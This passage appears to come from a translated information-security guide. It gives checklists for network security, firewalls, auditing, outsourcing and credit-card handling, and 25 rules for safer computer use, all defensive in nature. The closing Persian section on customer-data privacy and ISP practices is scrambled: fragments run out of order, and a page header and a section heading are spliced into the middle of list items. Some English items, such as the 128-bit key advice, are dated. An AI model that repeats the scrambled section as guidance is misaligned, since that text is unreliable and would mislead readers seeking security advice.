[189] Ibid., Chapter 6, Unplanned Security, p. 95
[190] Ibid., Chapter 2, Proactive Security, p. 32

Internal network security checklist [191]

• Are there defined policies and procedures for configuring systems?
• Do these policies and procedures cover file access permissions, passwords, and patches?
• Have you disabled unnecessary services?
• Is there a policy for physical security?
• Do all users have a password?
• Have the default accounts present on the system been changed?
• Does the security policy prohibit use of the default "Guest" user accounts?
• Are unused accounts disabled on a regular basis?
• Are new security patches applied as part of the system installation process?
• On the systems you support, do you try to crack passwords that are easy to guess? How often?
• Are intrusion experiences shared in order to improve processes?
• Do you take proper precautions when copying files?

External networks and firewalls checklist [192]

• Are security roles and responsibilities clearly defined?
• Have unnecessary network services been disabled?
• Does someone review the firewall settings regularly? How often?
• Is someone responsible for penetration testing the firewall?
• Is it clear who is responsible for updating the firewall (when necessary)?
• Has adequate investment been made in administering, updating, and maintaining the firewall?
• Are managers aware of their own role in the security process and the role of the people who report to them?
• Are emergency roles and responsibilities clearly and formally defined?
• Do support staff follow defined preventive procedures?
• Is intrusion detection software installed on the systems and the network?
• Is audit software installed on all highly sensitive systems?
• Is antivirus software installed at every network entry point?
• Do you watch for unauthorized changes to files? How often?

Network access control checklist

• Is management involved in the process of approving connections to external networks?
• Does anyone keep track of connections to outside the organization?
• Do managers know how many employees and contractors are connected to outside the organization?
• Is the real need for external connections examined before they are approved?
• Does the company review external connections regularly in order to control them?
• Is there a specific procedure for disabling the connections of employees or contractors who have left?
• Are there specific policies and procedures for installing a firewall?
• Is there a specific policy and procedure for establishing customer connections to external networks?
• Are all policies and procedures relating to connections enforced as mandatory?

Security auditing

While an organization spends a great deal of time and money developing security policies and procedures, training employees, and supporting security managers and specialists, the effectiveness of these efforts must also be evaluated continually. A security audit reveals those weaknesses in the overall security program that have arisen through growth and change over the life of the organization, or that for whatever reason could not be addressed. Audits can have a further benefit: if wrongdoers know that you are looking for them, they may limit their activity.

The most common mistakes that security audit procedures can identify are:

• missing security patches;
• excessive file access permissions;
• simple, easily guessed passwords;
• unnecessary network services left enabled; and
• firewall rules that are unclear or not enforced.

The checklist below is provided as a baseline for security audits, whether they are carried out by company employees or by outside specialists.

Audit procedures checklist [194]

• Do you have a formal audit policy?
• Have you prepared written audit procedures for security testing?
• Are audits carried out on a regular schedule?
• Is audit software installed on all the types of operating system you run (Unix/Linux, Mac, Windows)?
• Is an adequate budget allocated for purchasing the audit tools that are needed?
• Do managers properly support the security audit process by making proper training available to auditors?

Outsourcing

Finally, we recognize that the complexity of IT security may force some organizations to use outside specialists to meet their security needs. The chapter devoted to this subject discussed in depth the points to consider when choosing a partner company, how to manage its activities, and when its activities should be closely supervised.

The following security list can serve as a further resource for companies that wish to use an external contractor to carry out their security activities:

Security outsourcing checklist [195] (technical considerations)

• Are connections between providers and customers (external network connections) reviewed regularly? How often?
• Is there a formal architecture for connecting providers and customers to your network through external networks?
• Is there a formal policy that determines when, under what conditions, and in what manner a connection from an external network is permitted?
• Does initiating a connection from an external network require management approval?
• Is some form of formal review mandatory before an external network is connected?

[191] Ibid., Chapter 8, Internal Network Security, p. 121
[192] Ibid., Chapter 7, Maintaining Security, p. 109
[194] Source: ITS, Chapter 9, Outsourcing, p. 133
[195] Source: ITS, Chapter 9, Outsourcing, p. 133

Chapter Twelve
E-commerce security rules for all users and companies

Four easy steps to a more secure computer

Setting up a computer securely takes a great deal of effort. If you do not have enough time for risk assessment and cost-benefit analysis, we recommend that you follow at least these four simple steps:

1. Decide how important security is to your office. If you believe security is highly important and that a security incident would cause you heavy losses, then security must be given sufficient priority. If you try to prevent security problems by making part-time use of a busy programmer who has had no formal security training, you are undoubtedly inviting security problems.
2. Educate your users and involve them in writing procedures. Are the users in your office aware of the risks that arise from weak security (and of which practices are weak from a security standpoint)? Users must know what to do and whom to contact if they see something unusual or suspicious. A suitable training program can turn users into part of your defence. Keeping users ignorant of the system's limitations and operation does not increase security, because there are always other sources of information available to determined attackers.
3. Write a detailed plan for making and storing backups. You should also keep backup copies away from your office premises, so that you can rebuild your system even after a serious disaster.
4. Be sceptical and curious. If something happens that seems unusual, suspect an attacker and investigate. You will usually find that the problem came from a mistake or from a fault in the way the resource was being used. Sometimes, however, a more serious problem may turn up. For this reason, whenever something occurs that you cannot analyse precisely, you should suspect that it is a security problem and examine it carefully.

Twenty-five more specific rules for safer computer use

Rule 1. Think about computer theft before it happens.
Rule 2. Make backups regularly, and make sure that if the computer is physically threatened the backups will not be harmed and will remain usable.
Rule 3. Choose passwords that you can remember easily but that are hard for other people to guess.
Rule 4. Always keep your operating system and key software up to date.
Rule 5. Configure your e-mail program so that it does not open attachments automatically.
Rule 6. Before opening any e-mail attachment, look carefully at its name to make sure it is not an executable program.
Rule 7. Never open an attachment received from a stranger unless you are sure the file cannot contain malicious code.
Rule 8. Avoid opening an attachment even from someone you know and trust unless you are sure it was sent deliberately.
Rule 9. Set up your e-mail program so that it neither processes fancy HTML scripts nor sends them to others.
Rule 10. Ask your ISP whether it checks e-mail for viruses and similar threats before delivering it to you.
Rule 11. Do not allow websites to download and run programs that might cause problems unless you are sure the site is trustworthy.
Rule 12. Turn on the display of the address of the website you are browsing and of the address you are connecting to. Also be very careful when browsing unfamiliar sites, especially if you allow them to run programs on your computer.
Rule 13. Check the conditions under which cookies are stored on your computer. If you cannot control them (for example when using a computer in a public place), take care not to enter your private information.
Rule 14. If any private or confidential information has been displayed on a web page, clear the cache when you have finished. If you cannot do so (for example when using a computer in a public place), it may be better to avoid doing private work on such computers.
Rule 15. If you do not use file sharing, disable it. If you do use file sharing, choose strong user names and passwords and restrict access permissions to the minimum that still lets you do the work you need.
Rule 16. If you share files with other users, make sure that they too take security seriously.
Rule 17. Instant messaging can be very efficient and useful, but use it with care and awareness.
Rule 18. Never use the administrator account for tasks that do not need administrative access, such as browsing websites, even on single-user computers.
Rule 19. Disable all Internet services that are not needed or are little used.
Rule 20. Equip every computer that is vulnerable to viruses with antivirus software, and update it daily to receive new virus signatures. You should also periodically scan all files on the machine for viruses.
Rule 21. Even for computers that are not particular targets of viruses, such as Unix-based systems, make sure that mail sent from them to other computers is not infected with viruses and poses no danger to the recipient.
Rule 22. Every computer should be protected by some kind of firewall, either as software on the computer itself or as a separate firewall protecting all the computers on a network.
Rule 23. If you use a remote access tool to control a computer, make sure it has strong security (at a minimum, a proper user ID and password), so that attackers cannot use similar tools to gain access to the system.
Rule 24. Logging of system operations and usage should be enabled to a sensible degree. Review these logs according to a defined procedure.
Rule 25. From time to time, review your security measures using a variety of methods and tests, so that you can fix possible flaws before an incident occurs.

Checklist for companies that handle credit card transactions

a) If your computer is not connected to a network

• Company computers should be kept in a physically secure location.
• A strong password should be required to unlock the computer, and as few people as possible should know it.
• Physical access allows a person to steal passwords, so physical security is very important. With physical access to a computer, it can be rebooted from a floppy disk or compact disc, bypassing all the security barriers of the operating system and applications (except encryption).
• File-level security mechanisms should be used to restrict access to data. Only the people who are meant to work with the data should have access to it (for Windows machines this means you should use the NTFS file system).
• Apply current security patches to operating systems, databases, and all application software. Note that securing new versions of operating systems is easier than securing older ones.
• Use antivirus and intrusion detection software on your systems.
• Advanced cryptographic algorithms should be used to encrypt credit card data files.
• Take care that temporary files do not contain unencrypted information. When they are no longer needed they should not merely be deleted from the system but removed in such a way that they cannot be recovered.
• All access to sensitive files should be recorded in log files, and these logs should be reviewed at set intervals to reveal potential problems or errors. The logs should be written to two log files, and the second copy should be kept somewhere other than the computer on which the application runs.
• Always follow the security alert mailing lists, so that you learn quickly of any reported weakness that may affect your system.
• If an attack occurs, take every possible precaution to reduce the risk.
• Make sure that all employees, and senior managers in particular, believe that security is very important to the organization.
• If you delete information such as credit card data and other financial data from a hard disk, make sure that the data can no longer be recovered in any way. This goes beyond simply deleting files. If you do not know how to destroy data completely, get help from specialists.
• Make backups at regular intervals, and make sure the copies that contain credit card information are secure.
• Publish a "privacy policy" telling users what data you store, what you use it for, and how you protect it (you may describe the protection indirectly and in general terms).
• If you authorize credit card charges online, make sure the communication line you use has the necessary security. If you use a modem, make sure that incoming calls from outside are not possible.
• If you print records that contain credit card data, you must also secure them physically, and destroy them with a paper shredder as soon as they are no longer needed.
• Buy several up-to-date books on e-commerce security from reputable sources, study them, and follow their recommendations. O'Reilly & Associates, John Wiley and Sons, and Osborne / McGraw-Hill have published good books on IT security. The price of these books may vary depending on where you live, but buying them and using them effectively is a very worthwhile investment.

b) If the computer must be accessible from the internal network:

• Everything said in the previous case, plus the following:
• Install a firewall to make sure that only authorized users and transactions can reach the computer and that public access to it is prevented.
• Install current security patches on all network equipment (routers, firewalls, switches, and so on).
• Use encryption for all credit card messages that are transmitted over the line.
• Disable all unnecessary network services (such as a Web server, Remote Procedure Call (RPC), and File Transfer Protocol (FTP)).

c) If credit card information is accessible through the World Wide Web:

• Everything said in the previous case, plus the following:
• Do not place credit card information on computers that can be reached from the Internet. Put the data on a separate machine behind a firewall, and access it using remote procedure calls or other communication methods together with a good filtering system at the firewall.

d)

• Encrypt all transactions on the network using the strongest algorithms available (with a 128-bit key if possible).
• Make sure that credit card information stored temporarily on the web server is deleted immediately after the transaction completes.
• Apply all of the points above, but with greater vigilance toward security risks. The computer, its transactions, and its activity logs must be closely and continuously monitored.
ﻓﻬﺮﺳﺖ ﻛﻨﺘﺮﻝ ﺣﻔﺎﻇﺖ ﺍﺯ ﺩﺍﺩﻩﻫﺎﻱ ﻣﺸﺘﺮﻱ ﺩﺭ ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﺩﺭ ﺍﻳﻨﺠﺎ ﻳﻚ ﺭﻭﺵ ﺳﺎﺩﻩ ﺍﻣﺎ ﻗﺎﺑﻞ ﺍﺟﺮﺍ ﺫﻛﺮ ﺷﺪﻩ ﻛـﻪ ﺁﻧـﺮﺍ ﺑـﻪ ﭘﺎﻳﮕﺎﻫﻬﺎﻱ ﻭﺑﻲ ﻛﻪ ﺑﻪ ﺣﺮﻳﻢ ﺧﺼﻮﺻﻲ ﺍﻓﺮﺍﺩ ﺍﻫﻤﻴﺖ ﻣﻲﺩﻫﻨـﺪ ﭘﻴﺸﻨﻬﺎﺩ ﻣﻲﻛﻨﻴﻢ .ﺩﺭ ﺻـﻔﺤﺔ ﺍﻭﻝ ﭘﺎﻳﮕـﺎﻩ ﻭﺏ ﺧـﻮﺩ ﺩﺭ ﻣـﻮﺭﺩ ﺳﻴﺎﺳﺘﻬﺎﻳﺘﺎﻥ ﺩﺭ ﻗﺒﺎﻝ ﺣﺮﻳﻢ ﺧﺼﻮﺻﻲ ﺑﻪ ﺍﻓﺮﺍﺩ ﺗﻮﺿﻴﺢ ﺩﻫﻴﺪ ،ﻭ ﺍﮔﺮ ﻧﻘﻄﺔ ﺍﺑﻬﺎﻣﻲ ﺩﺭ ﻣﻮﺭﺩ ﺳﻴﺎﺳﺘﻬﺎﻳﺘﺎﻥ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﺍﺟﺎﺯﻩ ﺩﻫﻴـﺪ ﺷﺮﻛﺘﺘﺎﻥ ﺗﻮﺳﻂ ﻣﻤﻴﺰﻫﺎﻳﻲ ﺍﺯ ﺧﺎﺭﺝ ﺷﺮﻛﺖ ﻣﻮﺭﺩ ﺑﺎﺯﺑﻴﻨﻲ ﻗـﺮﺍﺭ ﮔﻴﺮﺩ. • ﺟﻬــﺖ ﺍﺳــﺘﻔﺎﺩﻩ ﺍﺯ ﭘﺎﻳﮕــﺎﻩ ﻭﺏ ،ﺍﺷــﺨﺎﺹ ﺭﺍ ﻣﻠــﺰﻡ ﺑــﻪ ﺛﺒﺖﻧﺎﻡ ﻭ ﻭﺭﻭﺩ ﺍﻃﻼﻋﺎﺕ ﺍﺿﺎﻓﻲ ﻧﻜﻨﻴﺪ. • ﺍﮔﺮ ﻛﺎﺭﺑﺮﺍﻥ ﻋﻼﻗﻪ ﻣﻨﺪ ﺑﻪ ﺩﺭﻳﺎﻓﺖ ﺑﻮﻟﺘﻦ ﻫﺴﺘﻨﺪ ،ﺍﺟـﺎﺯﻩ ﺩﻫﻴــﺪ ﻛــﻪ ﺑــﺮﺍﻱ ﺛﺒــﺖ ﻧــﺎﻡ ﺗﻨﻬــﺎ ﺍﺯ ﺁﺩﺭﺱ ﭘــﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺧﻮﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻨﺪ. • ﻫﺮﮔﺎﻩ ﻧﺎﻣﻪﺍﻱ ﺑﺮﺍﻱ ﺍﻓـﺮﺍﺩ ﺍﺭﺳـﺎﻝ ﻣـﻲﻛﻨﻴـﺪ ،ﺑـﻪ ﺁﻧﻬـﺎ ﺗﻮﺿﻴﺢ ﺩﻫﻴﺪ ﻛﻪ ﺁﺩﺭﺱ ﭘﺴﺘﻲ ﺁﻧﻬـﺎ ﺭﺍ ﭼﮕﻮﻧـﻪ ﺑﺪﺳـﺖ ﺁﻭﺭﺩﻩﺍﻳــﺪ ﻭ ﺁﻧﻬــﺎ ﭼﮕﻮﻧــﻪ ﻣــﻲﺗﻮﺍﻧﻨــﺪ ﺁﺩﺭﺱ ﺧــﻮﺩ ﺭﺍ ﺍﺯ ﻓﻬﺮﺳﺖ ﺩﺭﻳﺎﻓﺖﻛﻨﻨﺪﮔﺎﻥ ﻧﺎﻣﻪﻫﺎﻱ ﺷﻤﺎ ﺣﺬﻑ ﻛﻨﻨﺪ. • ﻓﺎﻳﻠﻬﺎﻱ ﺛﺒﺖ ﺧﻮﺩ ﺭﺍ ﺩﺭ ﺩﺳﺘﺮﺱ ﻋﻤﻮﻡ ﻗـﺮﺍﺭ ﻧﺪﻫﻴـﺪ ﻭ ﺩﺭﺻﻮﺭﺕ ﺍﻣﻜﺎﻥ ﺁﻧﻬﺎ ﺭﺍ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻛﻨﻴﺪ. • ﺯﻣﺎﻧﻴﻜﻪ ﺩﻳﮕﺮ ﻧﻴﺎﺯﻱ ﺑﻪ ﻓﺎﻳﻠﻬـﺎﻱ ﺛﺒـﺖ ﻧﺪﺍﺭﻳـﺪ ،ﺁﻧﻬـﺎ ﺭﺍ ﭘﺎﻙ ﻛﻨﻴﺪ. • ﺍﮔﺮ ﻻﺯﻡ ﺍﺳﺖ ﻓﺎﻳﻠﻬـﺎﻱ ﺛﺒـﺖ ﺑـﺮﺍﻱ ﻣـﺪﺕ ﺯﻳـﺎﺩﻱ ﺍﺯ ﻃﺮﻳﻖ ﺍﻳﻨﺘﺮﻧﺖ ﻗﺎﺑﻞ ﺩﺳﺘﺮﺳـﻲ ﺑﺎﺷـﻨﺪ ،ﺍﻃﻼﻋـﺎﺗﻲ ﻛـﻪ ﺑﺎﻋﺚ ﺷﻨﺎﺳﺎﻳﻲ ﺍﺷﺨﺎﺹ ﻣﻲﺷـﻮﺩ ﺭﺍ ﺍﺯ ﺭﻭﻱ ﺁﻥ ﺣـﺬﻑ ﻛﻨﻴﺪ. • ﻧﺎﻗﻀﺎﻥ ﺳﻴﺎﺳﺖ ﺣﺮﻳﻢ ﺧـﺼﻮﺻﻲ ﺭﺍ ﺗﺄﺩﻳـﺐ ﻳـﺎ ﺍﺧـﺮﺍﺝ ﻧﻤﺎﻳﻴﺪ. ﻓﻬﺮﺳﺖ ﻛﻨﺘﺮﻝ ISPﻫﺎ ﺍﻳﻦ ﻓﻬﺮﺳﺖ ﻧﺴﺒﺖ ﺑﻪ ﺁﻧﭽﻪ ﻛﻪ ﺑـﺴﻴﺎﺭﻱ ﺍﺯ ISPﻫـﺎ ﺍﺳـﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻨﺪ ﻣﻔﺼﻞﺗـﺮ ﺍﺳـﺖ ،ﺍﻣـﺎ ﺑـﺴﻴﺎﺭ ﺍﻫﻤﻴـﺖ ﺩﺍﺭﺩ ﻛـﻪ ﻫﻤـﺔ ﮔﺰﻳﻨﻪﻫﺎ ﻣﻮﺭﺩ ﺑﺮﺭﺳﻲ ﻗﺮﺍﺭ ﮔﻴﺮﻧﺪ ﻭ ﺗﺼﻤﻴﻢ ﻋﺎﻗﻼﻧـﻪﺍﻱ ﺩﺭﺑـﺎﺭﺓ ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﺁﻧﻬﺎ ﺍﺗﺨﺎﺫ ﮔﺮﺩﺩ. • ﺍﺯ ﺁﻧﺠﺎ ﻛﻪ ﮔﺎﻫﻲ ﺍﻃﻼﻋـﺎﺕ ﻛـﺎﺭﺕ ﺍﻋﺘﺒـﺎﺭﻱ ﻳـﺎ ﺳـﺎﻳﺮ ﺍﻃﻼﻋﺎﺕ ﻣﺎﻟﻲ ﻣﺸﺘﺮﻱ ﺭﺍ ﺫﺧﻴﺮﻩ ﻣﻲﻛﻨﻴﺪ ،ﺗﻤﺎﻡ ﻗـﻮﺍﻧﻴﻦ ﺫﺧﻴﺮﻩﺳﺎﺯﻱ ﺩﺍﺩﻩﻫﺎﻱ ﺍﻋﺘﺒﺎﺭﻱ ﺑﺎﻳﺪ ﺍﻋﻤﺎﻝ ﺷﻮﻧﺪ. • ﺗﺄﻣﻴﻦ ﺍﻣﻨﻴﺖ ﻳﻚ ﻓﺮﺁﻳﻨﺪ ﺑﻲﺿﺎﺑﻄﻪ ﻳﺎ ﻛﻠﻴﺸﻪﺍﻱ ﻧﻴﺴﺖ. ﻣﻮﺿﻮﻋﺎﺕ ﻣﺨﺘﻠﻒ ﺭﺍ ﺩﺭﻙ ﻛﻨﻴﺪ ﻭ ﺑﺮﺍﻱ ﻫﺮﻳﻚ ﻃﺮﺣﻲ ﻛﻠﻲ ﺑﺮﻳﺰﻳﺪ. 
• ﻳﻚ ﺳﻴﺎﺳﺖ ﺍﻣﻨﻴﺘﻲ ﺗﺪﻭﻳﻦ ﻛﻨﻴﺪ ﺷـﺎﻣﻞ :ﻣﻴـﺰﺍﻥ ﺗﻌﻬـﺪ ﺷﻤﺎ ﺑﻪ ﻣﺤﺮﻣﺎﻧـﻪ ﻣﺎﻧـﺪﻥ ﺍﻃﻼﻋـﺎﺕ ﺣـﺮﻳﻢ ﺧـﺼﻮﺻﻲ ﻣﺸﺘﺮﻳﺎﻥ )ﺩﺭ ﻣﻘﺎﺑﻞ ﺩﺳﺘﺮﺳـﻲ ﻛﺎﺭﻣﻨـﺪﺍﻥ ﺧـﻮﺩ ﻳـﺎ ﺳـﺎﺯﻣﺎﻧﻬﺎﻱ ﺩﻳﮕﺮ(؛ ﻭ ﺭﻭﻧﺪﻫﺎﻱ ﮔﺰﺍﺭﺵﺩﻫﻲ ﻫﻨﮕﺎﻡ ﻭﻗﻮﻉ ﻳﻚ ﺣﻤﻠـﺔ ﺑﺨﺶ ﺳﻮﻡ ﺍﮔﺮ ﺍﻃﻼﻋﺎﺕ ﻛﺎﺭﺕ ﺍﻋﺘﺒﺎﺭﻱ ﺣﺘﻤـ ﹰﺎ ﺑﺎﻳـﺪ ﺭﻭﻱ ﺭﺍﻳﺎﻧﺔ ﻗﺎﺑﻞ ﺩﺳﺘﺮﺳﻲ ﺍﺯ ﺍﻳﻨﺘﺮﻧﺖ ﻗﺮﺍﺭ ﺑﮕﻴﺮﺩ: • ﺑﺪﻭﻥ ﺍﺟﺎﺯﺓ ﺻﺮﻳﺢ ﻛـﺎﺭﺑﺮ ،ﺁﺩﺭﺱ ﭘـﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﻭ ﺍﻃﻼﻋﺎﺕ ﺷﺨـﺼﻲ ﻛـﺎﺭﺑﺮﺍﻥ ﺭﺍ ﺩﺭ ﺍﺧﺘﻴـﺎﺭ ﺳـﺎﺯﻣﺎﻧﻬﺎﻱ ﺩﻳﮕﺮ ﻧﮕﺬﺍﺭﻳﺪ. ٢١٠ ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﺍﻣﻨﻴﺘﻲ )ﮔﺰﺍﺭﺵ ﺑﻪ ﻋﻮﺍﻣﻞ ﺩﺍﺧﻠـﻲ ﺳـﺎﺯﻣﺎﻥ ،ﺑـﻪ ISPﻫـﺎ ،ﻭ ﻧﻴـﺰ • ﻣﻘﺎﻣﺎﺕ ﻣﺴﺌﻮﻝ( • ﻣﺴﺌﻮﻟﻴﺘﻬﺎﻱ ﻗﺎﻧﻮﻧﻲ ﺧـﻮﺩ ﺭﺍ ﺷﻨﺎﺳـﺎﻳﻲ ﻛﻨﻴـﺪ )ﺁﻳـﺎ ﺗﻨﻬـﺎ ﻣﺴﺌﻮﻟﻴﺖ ﺣﻔﻆ ﺍﻃﻼﻋﺎﺕ ﺑﺎ ﺷﻤﺎﺳﺖ ،ﻓﺎﻳﻠﻬﺎﻱ ﺛﺒﺖ ﺭﺍ ﺗﺎ ﭼﻪ ﻣﺪﺕ ،ftp ،icq ،fingerﻛﺎﻣﭙﺎﻳﻠﺮﻫـﺎ ﻭ (...ﺭﻭﻱ ﺩﺳﺘﮕﺎﻫﻬﺎﻱ ﻗﺎﺑـﻞ ﺍﺗﺼﺎﻝ ﺑﻪ ﺍﻳﻨﺘﺮﻧﺖ ،ﻏﻴﺮﻓﻌﺎﻝ ﺷﺪﻩﺍﻧﺪ. • ﻣﻄﻤﺌﻦ ﺷﻮﻳﺪ ﻛﻪ ﻫﻤﺔ ﺩﺳـﺘﮕﺎﻫﻬﺎ -ﺧـﺼﻮﺻﹰﺎ ﺁﻧﻬـﺎﻳﻲ ﻛــﻪ ﻗﺎﺑــﻞ ﺍﺗــﺼﺎﻝ ﺑــﻪ ﺍﻳﻨﺘﺮﻧــﺖ ﻫــﺴﺘﻨﺪ -ﺑــﺎ ﺍﻋﻤــﺎﻝ ﻭﺻﻠﻪﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺑﻪﺭﻭﺯ ﻧﮕﻬﺪﺍﺷﺘﻪ ﻣﻲﺷﻮﻧﺪ. • ﻳﻚ ﺳﻴﺴﺘﻢ ﻛﻨﺘﺮﻝ ﻣﺪﺍﻭﻡ ﺷﺒﻜﻪ ﺍﻳﺠﺎﺩ ﻛﻨﻴﺪ ﺗـﺎ ﺑﺘﻮﺍﻧﻴـﺪ ﻣــﺸﻜﻼﺗﻲ ﺍﺯ ﻗﺒﻴــﻞ ﺣﻤــﻼﺕ ﺗﺨﺮﻳــﺐ ﺳــﺮﻭﻳﺲ ﻭ ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﻋﻤﺪﺓ ﻭﻳﺮﻭﺳـﻬﺎ ﻭ ﻫﺮﺯﻧﺎﻣـﻪﻫـﺎ ﺭﺍ ﺗـﺸﺨﻴﺺ ﺩﻫﻴﺪ .ﺍﻳﻦ ﻧﻴﺎﺯﻣﻨﺪ ﺁﻥ ﺍﺳﺖ ﻛـﻪ ﻗـﺎﺩﺭ ﺑﺎﺷـﻴﺪ ﺍﻟﮕﻮﻫـﺎﻱ ﻃﺒﻴﻌﻲ ﺗﺮﺍﻓﻴﻚ ﺷﺒﻜﺔ ﺧﻮﺩ ﺭﺍ ﺩﺭﻙ ﻛﻨﻴﺪ. • ﺑﺮﺍﻱ ﺭﺍﻳﺎﻧﻪﻫﺎ ﻗﺎﺑﻠﻴﺖ ﻛﻨﺘﺮﻝ ﺍﻳﺠﺎﺩ ﻛﻨﻴﺪ ﺗﺎ ﺑﻬﺘﺮ ﺑﺘﻮﺍﻧﻴـﺪ ﻣﻬﺎﺟﻤﺎﻥ ﺭﺍ ﺗﺸﺨﻴﺺ ﺩﻫﻴﺪ )ﻣﺎﺷﻴﻨﻬﺎﻱ ﻣﻴﺰﺑﺎﻥ ﻓﺎﻳﻠﻬﺎﻱ ﺛﺒﺖ ﻭ ﺍﻃﻼﻋﺎﺕ ﺣﺴﺎﺑﻬﺎﻱ ﻛﺎﺭﺑﺮﻱ ﺭﺍ ﻓﺮﺍﻣﻮﺵ ﻧﻜﻨﻴﺪ(. • ﻭﻳﺮﻭﺱﻳﺎﺏﻫﺎ ﺭﺍ ﺩﺭ ﻫﺮ ﺟﺎﻳﻲ ﻛﻪ ﻭﺭﻭﺩ ﻳﺎ ﺧﺮﻭﺝ ﭘـﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺻﻮﺭﺕ ﻣﻲﮔﻴﺮﺩ ﻧﺼﺐ ﻛﻨﻴﺪ. • ﺑﺎ ﺗﻬﻴﻪ ﺿﺪﻭﻳﺮﻭﺳﻬﺎﻱ ﺭﺍﻳﮕﺎﻥ ﻳﺎ ﺍﺭﺯﺍﻥﻗﻴﻤﺖ ،ﻣـﺸﺘﺮﻳﺎﻥ ﺧﻮﺩ ﺭﺍ ﺗﺮﻏﻴﺐ ﻛﻨﻴﺪ ﻛﻪ ﺩﺳﺘﮕﺎﻩ ﺧﻮﺩ ﺭﺍ ﺍﻳﻤﻦ ﺳﺎﺯﻧﺪ. • ﻣﺮﺍﻗﺐ ﺑﺎﺷﻴﺪ ﻛﻪ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﭘﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﺑـﻪ ﻳﻚ ﺗﻮﺯﻳﻊﻛﻨﻨﺪﺓ ﻫﺮﺯﻧﺎﻣﻪ ﺗﺒﺪﻳﻞ ﻧﺸﻮﺩ. • ﻣﻜﺎﻧﻴﺰﻣﻬﺎﻱ ﻛﻨﺘﺮﻝ ﻫﺮﺯﻧﺎﻣﻪ ﺭﺍ ﻧﺼﺐ ﻛﻨﻴﺪ. • ﻛﻠﻴﺔ ﺩﺳﺘﺮﺳﻴﻬﺎ ﺑﻪ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎ ﻭ ﺑﺮﻗﺮﺍﺭﻱ ﻭ ﻗﻄـﻊ ﺍﺗﺼﺎﻝ ﺑﻪ ﺷﺒﻜﻪ ﺭﺍ ﺛﺒﺖ ﻛﻨﻴـﺪ ﺗـﺎ ﺗﻮﺍﻧـﺎﻳﻲ ﺧـﻮﺩ ﺑـﺮﺍﻱ ﺟﻤﻊﺁﻭﺭﻱ ﻣﺪﺍﺭﻙ ﻗﺎﻧﻮﻧﻲ ﻋﻠﻴـﻪ ﻧﻔـﻮﺫﮔﺮﺍﻥ ﺭﺍ ﺍﻓـﺰﺍﻳﺶ ﺩﺍﺩﻩ ﺑﺎﺷﻴﺪ. • ﺍﺯ ﺭﻭﺍﻟﻬﺎﻱ ﺗﻬﻴﺔ ﭘﺸﺘﻴﺒﺎﻥ ﺍﺯ ﺍﻃﻼﻋﺎﺕ ﺧـﻮﺩ ﻭ ﻛـﺎﺭﺑﺮﺍﻥ ﻣﺠﻤﻮﻋﻪﺍﻱ ﺳﺨﺘﮕﻴﺮﺍﻧﻪ ﻭ ﻫﻤﭙﻮﺷﺎﻥ ﺍﻳﺠﺎﺩ ﻛﻨﻴﺪ. • ﻭﺻـــﻠﻪﻫـــﺎﻱ ﺍﻣﻨﻴﺘـــﻲ ﺭﺍ downloadﻭ ﺍﺯ ﻃﺮﻳـــﻖ ﺩﻳﺴﻜﻬﺎﻱ ﻓﺸﺮﺩﻩ ﻭ ﻳﺎ ﺷﺒﻜﺔ ﺗﻮﺯﻳﻊ ﻣﺤﻠﻲ ،ﺗﻮﺯﻳﻊ ﻛﻨﻴﺪ. 
